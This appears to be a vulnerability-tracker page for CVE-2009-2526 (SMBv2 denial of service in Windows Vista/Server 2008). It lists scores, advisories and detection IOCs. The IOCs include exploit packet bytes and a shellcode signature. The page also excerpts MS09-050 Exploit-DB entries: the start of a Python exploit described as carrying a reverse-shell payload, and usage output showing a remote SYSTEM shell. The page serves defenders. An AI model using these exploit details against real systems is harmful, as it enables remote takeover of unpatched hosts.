CVE-2009-2526
published 2009-10-14CVE-2009-2526: Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to…
PriorityP272high7.8CVSS 2.0
AVNACLAuNCNINAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
81.89%
99.6th percentile
Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8
bytes↗
\x00\x02\x53\x4d\x42\x20\x32\x2e\x30\x30\x32\x00
bytes↗
\x04\x0d\xdf\xff (repeated 25 times)
bytes↗
\xb4\xff\xff\x3f
bytes↗
\x09\x0d\xd0\xff
- →Detect oversized or malformed SMBv2 Negotiate packets targeting srv2.sys — the exploit sends a crafted ~926-byte (0x039e) NetBIOS-framed SMB packet to TCP/445 containing the SMB2 dialect string '\x53\x4d\x42\x20\x32\x2e\x30\x30\x32' and a repeated 4-byte pattern '\x04\x0d\xdf\xff' 25 times. ↗
- →Monitor for unexpected listening ports opened on victim Windows Vista/Server 2008 hosts, specifically TCP/28876, which the exploit spawns as a backdoor shell. ↗
- →The exploit requires a follow-up SMB authentication event to trigger injected shellcode; monitor for rpcclient or anonymous/low-credential SMB authentication attempts immediately after a large malformed SMBv2 Negotiate packet from the same source IP. ↗
- →Look for SMBv2 Negotiate packets with ProcessID field anomalies (high process ID bytes '\x17\x02') combined with oversized payloads — indicative of the ProcessID Function Table Dereference exploitation technique. ↗
- →The stager shellcode contains the sysenter hook trampoline signature starting with '\xfc\xfa\xeb\x1e\x5e'; detect this byte sequence in SMB packet payloads. ↗
- ·The Python exploit (EDB-40280) hardcodes a Meterpreter reverse_tcp shellcode connecting back to LHOST=192.168.30.77 on LPORT=443; defenders should treat these as example values only — real-world use will substitute attacker-controlled IPs/ports. ↗
- ·The binary exploit (EDB-14674) targets Vista SP1 and SP2 only and is described as reliable only for those versions; it was not updated after initial creation and may not work against other affected versions listed in the CVE (Server 2008 Gold/SP2). ↗
CVSS provenance
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
vulncheck7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6cf2-g5cm-mr2w: Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attacker
ghsa_unreviewed·2022-05-02
CVE-2009-2526 [HIGH] GHSA-6cf2-g5cm-mr2w: Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attacker
Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability."
VulnCheck
Microsoft Windows Mitigating Factors for SMBv2 Infinite Loop
vulncheck·2009·CVSS 7.8
CVE-2009-2526 [HIGH] Microsoft Windows Mitigating Factors for SMBv2 Infinite Loop
Microsoft Windows Mitigating Factors for SMBv2 Infinite Loop
Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability."
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
No detection rules found.
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
exploitdb·2016-02-26
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
---
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
try:
target = sys.argv[1]
except IndexError:
print '\nUsage: %s \n' % sys.a
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
exploitdb·2010-08-17
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
---
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!
Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)
Kudos for:
Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.
Special kudos for prdelka for testing this shit and all the hosters.
Sample usage
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
When all is done it should spawn a port TARGET_IP:2
No writeups or analysis indexed.
http://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5595http://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5595
2009-10-14
Published
Exploited in the wild